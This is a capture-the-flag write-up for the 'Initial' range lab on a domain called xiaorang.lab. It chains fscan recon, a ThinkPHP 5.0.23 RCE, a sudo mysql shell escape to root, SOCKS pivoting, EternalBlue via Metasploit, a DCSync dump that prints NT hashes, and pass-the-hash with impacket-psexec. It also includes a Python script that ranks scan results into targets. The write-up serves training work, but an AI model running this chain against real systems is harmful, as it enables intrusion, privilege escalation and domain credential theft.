春秋云镜-Initial

Contents
  1. FLAG1
  2. FLAG2&&FLAG3

FLAG1

Start with information gathering: a port and vulnerability scan of the public IP with fscan.

┌──(root㉿kali)-[~/Desktop/tmp]
└─# ../pentest/fscan/fscan2 -h 39.99.232.66
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-04-18 08:00:46] [INFO] brute-force threads: 1
[2025-04-18 08:00:46] [INFO] starting information scan
[2025-04-18 08:00:46] [INFO] final valid host count: 1
[2025-04-18 08:00:46] [INFO] starting host scan
[2025-04-18 08:00:46] [INFO] valid port count: 233
[2025-04-18 08:00:46] [SUCCESS] port open 39.99.232.66:22
[2025-04-18 08:00:46] [SUCCESS] port open 39.99.232.66:80
[2025-04-18 08:00:46] [SUCCESS] service identified 39.99.232.66:22 => [ssh] version:8.2p1 Ubuntu 4ubuntu0.5 product:OpenSSH os:Linux info:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-18 08:00:51] [SUCCESS] service identified 39.99.232.66:80 => [http]
[2025-04-18 08:00:55] [INFO] live port count: 2
[2025-04-18 08:00:55] [INFO] starting vulnerability scan
[2025-04-18 08:00:55] [INFO] loaded plugins: ssh, webpoc, webtitle
[2025-04-18 08:00:55] [SUCCESS] web title http://39.99.232.66 status:200 length:5578 title:Bootstrap Material Admin
[2025-04-18 08:00:57] [SUCCESS] target: http://39.99.232.66:80
vulnerability type: poc-yaml-thinkphp5023-method-rce
vulnerability name: poc1
details:
links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
[2025-04-18 08:01:01] [SUCCESS] scan finished: 3/3

Port 80 runs ThinkPHP with the 5.0.23 method RCE that fscan flagged, so a ready-made ThinkPHP exploit tool gives a shell as www-data straight away. For privilege escalation, `sudo -l` shows that www-data may run /usr/bin/mysql as root without a password. The mysql client's `\!` escape runs a system command, and because the client itself is running as root, so does anything launched through it (the same escape with /bin/sh instead of cat gives an interactive root shell).

(www-data:/) $ sudo -l
Matching Defaults entries for www-data on ubuntu-web01:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu-web01:
(root) NOPASSWD: /usr/bin/mysql
sudo mysql -e '\! cat /root/flag/flag01.txt'

That reads flag01, the first flag.

FLAG2&&FLAG3

Drop an SSH public key into root's authorized_keys through the same sudo mysql shell escape, log in over SSH as root, upload fscan to the host and set up a SOCKS proxy into the internal network. First check which network the host sits on:

(www-data:/tmp) $ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:25:0c:72 brd ff:ff:ff:ff:ff:ff
inet 172.22.1.15/16 brd 172.22.255.255 scope global dynamic eth0
valid_lft 315359017sec preferred_lft 315359017sec
inet6 fe80::216:3eff:fe25:c72/64 scope link
valid_lft forever preferred_lft forever
root@ubuntu-web01:~# ./fscan -h 172.22.1.15/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-04-18 20:14:45] [INFO] brute-force threads: 1
[2025-04-18 20:14:45] [INFO] starting information scan
[2025-04-18 20:14:45] [INFO] CIDR range: 172.22.1.0-172.22.1.255
[2025-04-18 20:14:45] [INFO] generated IP range: 172.22.1.0.%!d(string=172.22.1.255) - %!s(MISSING).%!d(MISSING)
[2025-04-18 20:14:45] [INFO] parsed CIDR 172.22.1.15/24 -> IP range 172.22.1.0-172.22.1.255
[2025-04-18 20:14:45] [INFO] final valid host count: 256
[2025-04-18 20:14:45] [INFO] starting host scan
[2025-04-18 20:14:45] [SUCCESS] target 172.22.1.15 alive (ICMP)
[2025-04-18 20:14:45] [SUCCESS] target 172.22.1.21 alive (ICMP)
[2025-04-18 20:14:45] [SUCCESS] target 172.22.1.2 alive (ICMP)
[2025-04-18 20:14:45] [SUCCESS] target 172.22.1.18 alive (ICMP)
[2025-04-18 20:14:48] [INFO] live host count: 4
[2025-04-18 20:14:48] [INFO] valid port count: 233
[2025-04-18 20:14:48] [SUCCESS] port open 172.22.1.2:88
[2025-04-18 20:14:48] [SUCCESS] port open 172.22.1.18:80
[2025-04-18 20:14:48] [SUCCESS] port open 172.22.1.15:80
[2025-04-18 20:14:48] [SUCCESS] port open 172.22.1.15:22
[2025-04-18 20:14:48] [SUCCESS] port open 172.22.1.18:445
[2025-04-18 20:14:48] [SUCCESS] port open 172.22.1.2:445
[2025-04-18 20:14:48] [SUCCESS] port open 172.22.1.21:445
[2025-04-18 20:14:48] [SUCCESS] port open 172.22.1.2:389
[2025-04-18 20:14:48] [SUCCESS] port open 172.22.1.2:139
[2025-04-18 20:14:48] [SUCCESS] port open 172.22.1.18:139
[2025-04-18 20:14:48] [SUCCESS] port open 172.22.1.21:139
[2025-04-18 20:14:48] [SUCCESS] port open 172.22.1.18:135
[2025-04-18 20:14:48] [SUCCESS] port open 172.22.1.2:135
[2025-04-18 20:14:48] [SUCCESS] port open 172.22.1.21:135
[2025-04-18 20:14:48] [SUCCESS] port open 172.22.1.18:3306
[2025-04-18 20:14:49] [SUCCESS] service identified 172.22.1.15:22 => [ssh] version:8.2p1 Ubuntu 4ubuntu0.5 product:OpenSSH os:Linux info:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-18 20:14:53] [SUCCESS] service identified 172.22.1.18:3306 => [mysql] product:MySQL info:unauthorized Banner:[D.j Host '172.22.1.15' is not allowed to connect to this MySQL server]
[2025-04-18 20:14:53] [SUCCESS] service identified 172.22.1.2:88 =>
[2025-04-18 20:14:54] [SUCCESS] service identified 172.22.1.18:445 =>
[2025-04-18 20:14:54] [SUCCESS] service identified 172.22.1.2:445 =>
[2025-04-18 20:14:54] [SUCCESS] service identified 172.22.1.21:445 =>
[2025-04-18 20:14:54] [SUCCESS] service identified 172.22.1.2:389 => [ldap] product:Microsoft Windows Active Directory LDAP os:Windows info:Domain: xiaorang.lab, Site: Default-First-Site-Name
[2025-04-18 20:14:54] [SUCCESS] service identified 172.22.1.2:139 => Banner:[.]
[2025-04-18 20:14:54] [SUCCESS] service identified 172.22.1.18:139 => Banner:[.]
[2025-04-18 20:14:54] [SUCCESS] service identified 172.22.1.21:139 => Banner:[.]
[2025-04-18 20:14:54] [SUCCESS] service identified 172.22.1.18:80 => [http]
[2025-04-18 20:14:54] [SUCCESS] service identified 172.22.1.15:80 => [http]

[2025-04-18 20:15:54] [SUCCESS] service identified 172.22.1.18:135 =>
[2025-04-18 20:15:54] [SUCCESS] service identified 172.22.1.2:135 =>
[2025-04-18 20:15:54] [SUCCESS] service identified 172.22.1.21:135 =>
[2025-04-18 20:15:54] [INFO] live port count: 15
[2025-04-18 20:15:54] [INFO] starting vulnerability scan
[2025-04-18 20:15:54] [INFO] loaded plugins: findnet, ldap, ms17010, mysql, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-04-18 20:15:54] [SUCCESS] NetInfo scan result
target host: 172.22.1.21
hostname: XIAORANG-WIN7
discovered network interfaces:
IPv4 addresses:
└─ 172.22.1.21
[2025-04-18 20:15:54] [SUCCESS] NetInfo scan result
target host: 172.22.1.2
hostname: DC01
discovered network interfaces:
IPv4 addresses:
└─ 172.22.1.2
[2025-04-18 20:15:54] [SUCCESS] NetInfo scan result
target host: 172.22.1.18
hostname: XIAORANG-OA01
discovered network interfaces:
IPv4 addresses:
└─ 172.22.1.18
[2025-04-18 20:15:54] [SUCCESS] web title http://172.22.1.15 status:200 length:5578 title:Bootstrap Material Admin
[2025-04-18 20:15:54] [INFO] system info 172.22.1.2 [Windows Server 2016 Datacenter 14393]
[2025-04-18 20:15:54] [SUCCESS] NetBios 172.22.1.2 DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[2025-04-18 20:15:54] [SUCCESS] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[2025-04-18 20:15:54] [SUCCESS] vulnerability found 172.22.1.21 [Windows Server 2008 R2 Enterprise 7601 Service Pack 1] MS17-010
[2025-04-18 20:15:54] [SUCCESS] web title http://172.22.1.18 status:302 length:0 title:(none) redirect: http://172.22.1.18?m=login
[2025-04-18 20:15:54] [SUCCESS] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[2025-04-18 20:15:55] [SUCCESS] web title http://172.22.1.18?m=login status:200 length:4012 title:信呼协同办公系统
[2025-04-18 20:15:55] [SUCCESS] target: http://172.22.1.15:80
vulnerability type: poc-yaml-thinkphp5023-method-rce
vulnerability name: poc1
details:
links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
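The scan above spreads what matters (which host is the DC, which one has MS17-010, which web app has a PoC hit) over a hundred lines. The triage helper below is an added example of mine, not code from the writeup or from fscan: it folds fscan's SUCCESS lines into one record per host and orders the hosts. The sample lines are trimmed from the internal scan output above (message text in English; the patterns key on the structural tokens `[SUCCESS]`, `IP:port`, `NetBios`, `DC:`, `MS17-010`, `poc-yaml-` and the `[ldap]` banner, so fscan's original Chinese messages parse the same way). The ranking rule (hosts with a known exploitable bug first, the DC last because it is usually reached with credentials rather than an exploit) is my own heuristic.

```python
import re
from collections import defaultdict

# Sample fscan 2.0.0 output, trimmed from the internal-network scan in this writeup.
SAMPLE_FSCAN = """\
[2025-04-18 20:14:48] [SUCCESS] port open 172.22.1.2:88
[2025-04-18 20:14:48] [SUCCESS] port open 172.22.1.18:80
[2025-04-18 20:14:48] [SUCCESS] port open 172.22.1.15:80
[2025-04-18 20:14:48] [SUCCESS] port open 172.22.1.15:22
[2025-04-18 20:14:48] [SUCCESS] port open 172.22.1.18:445
[2025-04-18 20:14:48] [SUCCESS] port open 172.22.1.2:445
[2025-04-18 20:14:48] [SUCCESS] port open 172.22.1.21:445
[2025-04-18 20:14:48] [SUCCESS] port open 172.22.1.2:389
[2025-04-18 20:14:48] [SUCCESS] port open 172.22.1.18:3306
[2025-04-18 20:14:54] [SUCCESS] service identified 172.22.1.2:389 => [ldap] product:Microsoft Windows Active Directory LDAP os:Windows info:Domain: xiaorang.lab, Site: Default-First-Site-Name
[2025-04-18 20:15:54] [SUCCESS] NetBios 172.22.1.2 DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[2025-04-18 20:15:54] [SUCCESS] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[2025-04-18 20:15:54] [SUCCESS] vulnerability found 172.22.1.21 [Windows Server 2008 R2 Enterprise 7601 Service Pack 1] MS17-010
[2025-04-18 20:15:54] [SUCCESS] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[2025-04-18 20:15:55] [SUCCESS] target: http://172.22.1.15:80
vulnerability type: poc-yaml-thinkphp5023-method-rce
vulnerability name: poc1
"""

IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
RE_PORT = re.compile(r"\[SUCCESS\] .*?" + IP + r":(\d+)\s*$")        # "... 172.22.1.2:88" at end of line
RE_NETBIOS = re.compile(r"\[SUCCESS\] NetBios " + IP + r" (.+)$")
RE_MS17 = re.compile(IP + r" \[[^\]]*\] (MS17-010)")
RE_TARGET = re.compile(r"\[SUCCESS\] .*?https?://" + IP + r"(?::\d+)?\s*$")  # web PoC "target:" line
RE_POC = re.compile(r"(poc-yaml-\S+)")
RE_DOMAIN = re.compile(r"\[ldap\].*?Domain: ([\w.-]+)")


def new_host():
    return {"ports": set(), "name": None, "os": None, "dc": False, "vulns": []}


def parse_fscan(lines):
    """Fold fscan's per-line SUCCESS messages into one record per host."""
    hosts = defaultdict(new_host)
    domain = None
    last_web_host = None  # PoC details follow the "target:" line, so remember its host
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        if m := RE_DOMAIN.search(line):
            domain = m.group(1)
        elif m := RE_NETBIOS.search(line):
            ip, rest = m.groups()
            host = hosts[ip]
            if rest.startswith("DC:"):  # fscan prefixes domain controllers with "DC:"
                host["dc"] = True
                rest = rest[3:]
            host["name"], _, host["os"] = rest.partition(" ")
        elif m := RE_MS17.search(line):
            hosts[m.group(1)]["vulns"].append(m.group(2))
        elif m := RE_TARGET.search(line):
            last_web_host = m.group(1)
        elif (m := RE_POC.search(line)) and last_web_host:
            hosts[last_web_host]["vulns"].append(m.group(1))
        elif m := RE_PORT.search(line):
            hosts[m.group(1)]["ports"].add(int(m.group(2)))
    return {"domain": domain, "hosts": dict(hosts)}


def rank_targets(hosts):
    """My heuristic: exploitable hosts first, the DC last (reached with creds, not an exploit)."""
    def key(item):
        ip, h = item
        return (0 if h["vulns"] else 1, 1 if h["dc"] else 0, ip)
    return [ip for ip, _ in sorted(hosts.items(), key=key)]


if __name__ == "__main__":
    inv = parse_fscan(SAMPLE_FSCAN.splitlines())
    print("domain:", inv["domain"])
    for ip in rank_targets(inv["hosts"]):
        h = inv["hosts"][ip]
        print(f"{ip:<14} {h['name'] or '-':<28} dc={h['dc']} ports={sorted(h['ports'])} "
              f"vulns={h['vulns']} os={h['os']}")
```

Run on the sample it lists 172.22.1.15 (the ThinkPHP foothold) and 172.22.1.21 (MS17-010) first, then the OA host, then DC01; the same order the rest of this writeup follows.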

172.22.1.21 (XIAORANG-WIN7, Windows Server 2008 R2) is flagged for MS17-010 (EternalBlue), so it can be taken with Metasploit through the SOCKS proxy. A bind payload is used on purpose: the target cannot reach back through the proxy to the attacker's machine, so a reverse payload would never connect.

proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

Next, dump domain credentials with a DCSync from the meterpreter session. DCSync asks the DC to replicate account secrets, so it only works when the security context the session runs in holds replication rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which a member server's machine account does not have by default; that it succeeded here means the token in use had them. The columns of the CSV output are RID, account name, NT hash and userAccountControl.

meterpreter > load kiwi
meterpreter > kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt fb812eea13a18b7fcdb8e6d67ddc205b 514
1106 Marcus e07510a4284b3c97c8e7dee970918c5c 512
1107 Charles f6a9881cd5ae709abb4ac9ab87f24617 512
1000 DC01$ 09bb349ab17bbe480b91eb20bb204bee 532480
500 Administrator 10cf89a850fb1cdbe6bb432b859164c8 512
1104 XIAORANG-OA01$ 25e4b9f501c8831b0568fcc61e4ddc7f 4096
1108 XIAORANG-WIN7$ acf1bc550440e81c9f2663ff304b4ab3 4096

With the domain Administrator's NT hash there is no need for a password: pass-the-hash with impacket-psexec gives a SYSTEM shell on the DC, and then on any other domain machine.

┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-psexec -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang.lab/Administrator@172.22.1.2 -codec gbk
C:\Users\Administrator\flag> type flag03.txt
┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-psexec -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang.lab/Administrator@172.22.1.18 -codec gbk
C:\Users\Administrator\flag> type flag02.txt

Looking at other people's writeups, it seems you're supposed to hit 172.22.1.18 first; it's an OA system that can be taken with an nday in one go. I'm not going to look into it.
